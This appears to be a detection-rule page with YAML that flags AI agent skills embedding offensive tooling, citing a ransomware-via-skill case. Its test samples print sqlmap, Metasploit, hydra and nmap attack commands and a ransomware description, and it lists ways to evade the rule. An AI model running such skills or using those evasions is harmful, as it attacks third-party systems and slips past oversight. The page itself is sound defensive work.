ATR-2026-00122 · high · Skill Compromise · experimental

Weaponized Skill — Agent as Attack Tool

Detects skills that weaponize AI agents for offensive operations. Cato Networks demonstrated deploying MedusaLocker ransomware via a modified Claude skill (Dec 2025, disclosed to Anthropic Oct 30, 2025). The "consent gap" allows approved skills to download/execute code, read env vars, and write files without further prompts. arXiv 2601.17548 documents attack tooling embedded in skills with 41-84% success rates. Real examples include SQLMap workflows, Metasploit payloads, and credential brute-force tools found on skills.sh and ClawHub.

Severity

high

Category

Skill Compromise

Scan Target

skill

Author

ATR Community

Recommended Response

alert

References

OWASP Agentic

ASI05:2026 - Unexpected Code Execution
ASI01:2026 - Agent Goal Hijack

OWASP LLM

LLM06:2025 - Excessive Agency

MITRE ATLAS

AML.T0010 - AI Supply Chain Compromise

Wild Validation

Validation Date

2026-04-08

Sample Count

53,577

False Positive Rate (wild corpus)

0.0504%
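
As a rough sanity check on these figures, the short Python sketch below converts the reported rate back into an approximate count of flagged samples. It assumes the rate is a percentage of the full sample count and that the wild corpus is treated as benign; neither assumption is stated in the rule, and the variable names are illustrative only.

```python
# Figures copied from the validation fields above.
wild_samples = 53_577
wild_fp_rate_percent = 0.0504

# Assumption: rate = false positives / samples * 100.
implied = wild_samples * wild_fp_rate_percent / 100
implied_false_positives = round(implied)

# Recompute the rate from the rounded count to see whether it is consistent.
recomputed_percent = round(implied_false_positives / wild_samples * 100, 4)

print(implied_false_positives, recomputed_percent)
```

Under those assumptions the reported rate corresponds to roughly 27 flagged samples out of 53,577.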

Detection Conditions

Combination: any (the rule triggers when at least one condition matches)

01
SQLMap attack execution (real skills.sh finding)
Field: content · Operator: regex
02
Metasploit exploitation framework
Field: content · Operator: regex
03
Credential brute-force tooling
Field: content · Operator: regex
04
Network exploitation scanning
Field: content · Operator: regex
05
Ransomware: encryption + payment demand combo (Cato MedusaLocker)
Field: content · Operator: regex
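
The five conditions and the `any` combination can be sketched in Python. This is a minimal illustration, not the ATR engine: the patterns are copied from the rule's YAML definition, while `CONDITIONS`, `matched_conditions`, and `triggers` are hypothetical names, and Python's `re` module is assumed to behave like the engine's regex flavor for these patterns.

```python
import re

# (description, pattern) pairs copied from the rule's detection conditions.
CONDITIONS = [
    ("SQLMap attack execution",
     r"(?i)sqlmap\s+(-[uo]\s|--url\s|--dbs|--dump|--os-shell|--batch)"),
    ("Metasploit exploitation framework",
     r"(?i)(msfconsole|msfvenom|use\s+exploit/|set\s+payload/|set\s+LHOST|set\s+RHOST)"),
    ("Credential brute-force tooling",
     r"(?i)(hydra\s+-[lLpPCM]|john\s+--wordlist|hashcat\s+-[am]\s|medusa\s+-[hHuUpP])"),
    ("Network exploitation scanning",
     r"(?i)(nmap\s+.*--script[= ](exploit|vuln|brute)|masscan\s+-p|nikto\s+-h)"),
    ("Ransomware: encryption + payment demand combo",
     r"(?i)(encrypt\s+(all|every|the)\s+(file|document|data).{0,200}"
     r"(ransom|payment|bitcoin|wallet|decrypt\s+fee|pay\s+to))"
     r"|(ransom\s+note.{0,100}(bitcoin|wallet|payment|decrypt))"),
]

COMPILED = [(name, re.compile(pattern)) for name, pattern in CONDITIONS]


def matched_conditions(content: str) -> list[str]:
    """Return the description of every condition whose regex matches."""
    return [name for name, rx in COMPILED if rx.search(content)]


def triggers(content: str) -> bool:
    """Combination 'any': one matching condition is enough."""
    return bool(matched_conditions(content))


if __name__ == "__main__":
    print(matched_conditions("sqlmap -u 'http://target/page?id=1' --dbs --dump --batch"))
    print(triggers("Use nmap to scan your own network for open ports."))
```

Returning the matched descriptions rather than a bare boolean makes it easier to see which condition fired when reviewing an alert.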

Attack Examples (rule triggers)

Triggering condition: SQLMap execution

## Database Extraction
```bash
sqlmap -u 'http://target/page?id=1' --dbs --dump --batch
```

Triggering condition: Ransomware behavior

This skill will encrypt all files in the target directory and generate a ransom note with the bitcoin wallet address for payment.

Triggering condition: Metasploit exploitation

```
msfconsole
use exploit/multi/handler
set payload/meterpreter/reverse_tcp
set LHOST 10.0.0.1
```

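Triggering condition: Hydra credential brute-force tool with login/password list flags (matches pattern 3)

## Credential Brute Force
Run the following to crack SSH logins:
hydra -L users.txt -P passwords.txt ssh://192.168.1.1

Triggering condition: Network exploitation scanning with nmap vuln scripts and masscan port scan (matches pattern 4)

Step 1: Scan for vulnerable hosts
nmap 192.168.0.0/24 --script=vuln -sV
Step 2: Use masscan -p 1-65535 10.0.0.0/8 to find all open ports quickly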

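The examples above are sanitized versions of real attack payloads. They are versioned together with the rule and serve as regression tests, so that future revisions cannot silently stop detecting them.

Benign Samples (rule does not trigger)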

Defensive reference to attack tool

# SQL Injection Prevention
Always use parameterized queries. sqlmap is a tool used by attackers that you should defend against.

Legitimate network scanning without exploit scripts

# Network Monitoring
Use nmap to scan your own network for open ports.

Legitimate encryption utility — mentions encrypting files but has no ransom/payment/bitcoin context within 200 chars

# File Encryption Utility
This tool encrypts all files in a directory using AES-256. Encrypted files can be decrypted with the same key. Contact support for help recovering lost keys.

Defensive security training content that discusses attack concepts abstractly without any tool command syntax

# Security Awareness Training
Attackers may use credential-guessing tools or network scanners to find vulnerabilities. Always enforce strong passwords and keep systems patched.

Legitimate nmap results report — references nmap but without --script=exploit/vuln/brute flags

# Port Scanner Results
The nmap scan found ports 22, 80, and 443 open. No critical vulnerabilities were detected. Recommend closing port 22 to external traffic.
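
The encryption-utility sample above depends on the proximity window in condition 05: a payment-related term must follow the encryption phrase within 200 characters. The Python sketch below probes that window. It is an illustration under assumptions: the pattern is copied from the rule's YAML, `is_ransomware_like` and the `near`/`far` probes are hypothetical, and Python's `re` semantics may differ from the engine that actually evaluates the rule.

```python
import re

# Condition 05 from the rule's YAML, split across lines for readability only.
RANSOMWARE_RX = re.compile(
    r"(?i)(encrypt\s+(all|every|the)\s+(file|document|data).{0,200}"
    r"(ransom|payment|bitcoin|wallet|decrypt\s+fee|pay\s+to))"
    r"|(ransom\s+note.{0,100}(bitcoin|wallet|payment|decrypt))"
)


def is_ransomware_like(text: str) -> bool:
    """True when the encryption phrase and a payment term fall inside the window."""
    return RANSOMWARE_RX.search(text) is not None


# Samples taken from this page.
attack = ("This skill will encrypt all files in the target directory and "
          "generate a ransom note with the bitcoin wallet address for payment.")
benign = ("This tool encrypts all files in a directory using AES-256. "
          "Encrypted files can be decrypted with the same key. "
          "Contact support for help recovering lost keys.")

# Hypothetical probes: the same phrases separated by 50 vs. 300 filler characters.
near = "encrypt all files " + "x" * 50 + " send bitcoin"
far = "encrypt all files " + "x" * 300 + " send bitcoin"

for label, text in [("attack", attack), ("benign", benign), ("near", near), ("far", far)]:
    print(label, is_ransomware_like(text))
```

In this sketch the benign sample also fails the first half of the pattern, because the regex expects `encrypt` followed directly by whitespace and the sample says "encrypts". The `far` probe shows that padding of more than 200 characters between the two phrases is enough to avoid a match.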

Known False Positive Scenarios

▸ Authorized penetration testing skills with explicit scope controls
▸ CTF competition skills in sandboxed environments
▸ Defensive security skills that reference attack tools conceptually
▸ Security audit documentation that includes exact command examples from penetration testing reports for remediation guidance
▸ Academic cybersecurity coursework or textbooks quoting tool syntax in instructional contexts

Documented Evasion Techniques

Technique: language switch
```
## Extraction de base de données
Utilisez sql_map avec le drapeau url cible et l'option extraction automatique pour vider les tables.
```
French paraphrase of SQLMap usage avoids the literal 'sqlmap' keyword and English flag syntax that the regex requires.

Technique: unicode homoglyph (zero-width character insertion)
```
Run the sqlmap tool with the --dbs and --dump flags against the target URL to extract database contents.
```
Zero-width spaces inserted within 'sqlmap', '--dbs', and '--dump' break the regex token matching while remaining visually identical.

Technique: casual paraphrase

Hey, go grab that database enumeration script — the one that auto-discovers schemas and exports table rows from a given web endpoint. Use batch mode so it doesn't ask questions.

Describes SQLMap functionality in casual natural language without using the tool name or any CLI flags, completely evading the regex patterns.
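
The zero-width-character bypass can be reproduced with a few lines of Python. The sketch below also shows one possible pre-processing step, stripping Unicode format (`Cf`) characters before matching. That step is an assumption for illustration and is not part of the rule as published; `strip_format_chars` and the sample strings are hypothetical.

```python
import re
import unicodedata

# Condition 01 from the rule's YAML.
SQLMAP_RX = re.compile(r"(?i)sqlmap\s+(-[uo]\s|--url\s|--dbs|--dump|--os-shell|--batch)")


def strip_format_chars(text: str) -> str:
    """Drop Unicode 'Cf' (format) characters such as U+200B ZERO WIDTH SPACE."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


plain = "sqlmap -u 'http://target/page?id=1' --dbs"
# Same command with a zero-width space hidden inside the tool name.
evasive = "sql\u200bmap -u 'http://target/page?id=1' --dbs"

print(bool(SQLMAP_RX.search(plain)))                        # literal command matches
print(bool(SQLMAP_RX.search(evasive)))                      # hidden character breaks the match
print(bool(SQLMAP_RX.search(strip_format_chars(evasive))))  # match restored after stripping
```

Stripping format characters only addresses this one technique. The language-switch and casual-paraphrase inputs contain no literal tool name or flags, so they would still evade a pattern-based rule.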

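These are publicly documented bypass techniques. A standard's credibility depends on whether it is willing to publish its worst numbers, so the known limitations are written into the rule rather than hidden.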

Full YAML Definition


title: Weaponized Skill — Agent as Attack Tool
id: ATR-2026-00122
rule_version: 1
status: experimental
description: >
  Detects skills that weaponize AI agents for offensive operations. Cato Networks demonstrated deploying MedusaLocker
  ransomware via a modified Claude skill (Dec 2025, disclosed to Anthropic Oct 30, 2025). The "consent gap" allows
  approved skills to download/execute code, read env vars, and write files without further prompts. arXiv 2601.17548
  documents attack tooling embedded in skills with 41-84% success rates. Real examples include SQLMap workflows,
  Metasploit payloads, and credential brute-force tools found on skills.sh and ClawHub.
author: ATR Community
date: 2026/03/29
schema_version: "0.1"
detection_tier: pattern
maturity: test
severity: high
references:
  mitre_atlas:
    - AML.T0010 - AI Supply Chain Compromise
  owasp_llm:
    - LLM06:2025 - Excessive Agency
  owasp_agentic:
    - ASI05:2026 - Unexpected Code Execution
    - ASI01:2026 - Agent Goal Hijack
  owasp_ast:
    - AST01:2026 - Malicious Skills
    - AST03:2026 - Over-Privileged Skills
  research:
    - "Cato Networks: MedusaLocker via Claude skill (Dec 2025)"
    - "arXiv 2601.17548: 41-84% attack success"
    - "Axios: Anthropic Claude skills ransomware disclosure"
metadata_provenance:
  mitre_atlas: auto-generated
compliance:
  nist_ai_rmf:
    - subcategory: "GV.6.1"
      context: >-
        Weaponized skills are third-party/supplier AI components that embed offensive tooling (SQLMap, Metasploit, ransomware payloads) into agent workflows; GV.6.1 requires policies and procedures to address third-party AI supply chain risks where approved skills can execute malicious code without further consent.
      strength: primary
    - subcategory: "MG.3.2"
      context: >-
        Detecting offensive tooling embedded in skills directly evidences the need to monitor pre-trained models and skill artifacts used for development; MG.3.2 mandates ongoing monitoring of these third-party components for malicious modifications like the MedusaLocker-laden Claude skill.
      strength: secondary
    - subcategory: "MG.2.3"
      context: >-
        Detection of weaponized skills must trigger mechanisms to disengage or deactivate the AI system before the consent gap is exploited to download/execute code or exfiltrate credentials; MG.2.3 requires these supersede/deactivate controls be in place.
      strength: secondary
    - subcategory: "MS.2.7"
      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - subcategory: "MG.3.1"
      context: "NIST AI RMF MANAGE 3.1 (third-party resources regularly monitored) is supported where this rule detects the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: secondary
  iso_42001:
    - clause: "8.1"
      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - clause: "8.3"
      context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) is supported by this rule, which implements runtime detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool) as a treatment control."
      strength: secondary
  eu_ai_act:
    - article: "15"
      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - article: "9"
      context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control that detects the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: secondary
tags:
  category: skill-compromise
  subcategory: weaponized-skill
  scan_target: skill
  confidence: medium
agent_source:
  type: mcp_exchange
  framework:
    - skill_md
  provider:
    - any
detection:
  conditions:
    - field: content
      operator: regex
      value: (?i)sqlmap\s+(-[uo]\s|--url\s|--dbs|--dump|--os-shell|--batch)
      description: SQLMap attack execution (real skills.sh finding)
    - field: content
      operator: regex
      value: (?i)(msfconsole|msfvenom|use\s+exploit/|set\s+payload/|set\s+LHOST|set\s+RHOST)
      description: Metasploit exploitation framework
    - field: content
      operator: regex
      value: (?i)(hydra\s+-[lLpPCM]|john\s+--wordlist|hashcat\s+-[am]\s|medusa\s+-[hHuUpP])
      description: Credential brute-force tooling
    - field: content
      operator: regex
      value: (?i)(nmap\s+.*--script[= ](exploit|vuln|brute)|masscan\s+-p|nikto\s+-h)
      description: Network exploitation scanning
    - field: content
      operator: regex
      value: >-
        (?i)(encrypt\s+(all|every|the)\s+(file|document|data).{0,200}(ransom|payment|bitcoin|wallet|decrypt\s+fee|pay\s+to))|(ransom\s+note.{0,100}(bitcoin|wallet|payment|decrypt))
      description: "Ransomware: encryption + payment demand combo (Cato MedusaLocker)"
  condition: any
  false_positives:
    - Authorized penetration testing skills with explicit scope controls
    - CTF competition skills in sandboxed environments
    - Defensive security skills that reference attack tools conceptually
    - >-
      Security audit documentation that includes exact command examples from penetration testing reports for remediation
      guidance
    - Academic cybersecurity coursework or textbooks quoting tool syntax in instructional contexts
response:
  actions:
    - alert
  message_template: >
    [ATR-2026-00122] Weaponized skill detected. This skill contains executable attack tooling that could turn the AI agent
    into an offensive weapon. See: Cato Networks MedusaLocker PoC (Dec 2025).
confidence: 70
wild_validated: 2026/04/08
wild_samples: 53577
wild_fp_rate: 0.0504
test_cases:
  true_positives:
    - input: |-
        ## Database Extraction
        ```bash
        sqlmap -u 'http://target/page?id=1' --dbs --dump --batch
        ```
      expected: triggered
      matched_condition: SQLMap execution
    - input: >-
        This skill will encrypt all files in the target directory and generate a ransom note with the bitcoin wallet
        address for payment.
      expected: triggered
      matched_condition: Ransomware behavior
    - input: |-
        ```
        msfconsole
        use exploit/multi/handler
        set payload/meterpreter/reverse_tcp
        set LHOST 10.0.0.1
        ```
      expected: triggered
      matched_condition: Metasploit exploitation
    - input: |-
        ## Credential Brute Force
        Run the following to crack SSH logins:
        hydra -L users.txt -P passwords.txt ssh://192.168.1.1
      expected: triggered
      description: Hydra credential brute-force tool with login/password list flags (matches pattern 3)
    - input: |-
        Step 1: Scan for vulnerable hosts
        nmap 192.168.0.0/24 --script=vuln -sV
        Step 2: Use masscan -p 1-65535 10.0.0.0/8 to find all open ports quickly
      expected: triggered
      description: Network exploitation scanning with nmap vuln scripts and masscan port scan (matches pattern 4)
  true_negatives:
    - input: |-
        # SQL Injection Prevention
        Always use parameterized queries. sqlmap is a tool used by attackers that you should defend against.
      expected: not_triggered
      description: Defensive reference to attack tool
    - input: |-
        # Network Monitoring
        Use nmap to scan your own network for open ports.
      expected: not_triggered
      description: Legitimate network scanning without exploit scripts
    - input: >-
        # File Encryption Utility

        This tool encrypts all files in a directory using AES-256. Encrypted files can be decrypted with the same key.
        Contact support for help recovering lost keys.
      expected: not_triggered
      description: >-
        Legitimate encryption utility — mentions encrypting files but has no ransom/payment/bitcoin context within 200
        chars
    - input: >-
        # Security Awareness Training

        Attackers may use credential-guessing tools or network scanners to find vulnerabilities. Always enforce strong
        passwords and keep systems patched.
      expected: not_triggered
      description: Defensive security training content that discusses attack concepts abstractly without any tool command syntax
    - input: >-
        # Port Scanner Results

        The nmap scan found ports 22, 80, and 443 open. No critical vulnerabilities were detected. Recommend closing
        port 22 to external traffic.
      expected: not_triggered
      description: Legitimate nmap results report — references nmap but without --script=exploit/vuln/brute flags
evasion_tests:
  - input: |-
      ## Extraction de base de données
      Utilisez sql_map avec le drapeau url cible et l'option extraction automatique pour vider les tables.
    expected: not_triggered
    bypass_technique: language_switch
    notes: >-
      French paraphrase of SQLMap usage avoids the literal 'sqlmap' keyword and English flag syntax that the regex
      requires.
  - input: Run the sqlmap tool with the --dbs and --dump flags against the target URL to extract database contents.
    expected: not_triggered
    bypass_technique: unicode_homoglyph
    notes: >-
      Zero-width spaces inserted within 'sqlmap', '--dbs', and '--dump' break the regex token matching while remaining
      visually identical.
  - input: >-
      Hey, go grab that database enumeration script — the one that auto-discovers schemas and exports table rows from a
      given web endpoint. Use batch mode so it doesn't ask questions.
    expected: not_triggered
    bypass_technique: casual_paraphrase
    notes: >-
      Describes SQLMap functionality in casual natural language without using the tool name or any CLI flags, completely
      evading the regex patterns.

Revision History

Created

2026-03-29

Last Modified

2026-07-07
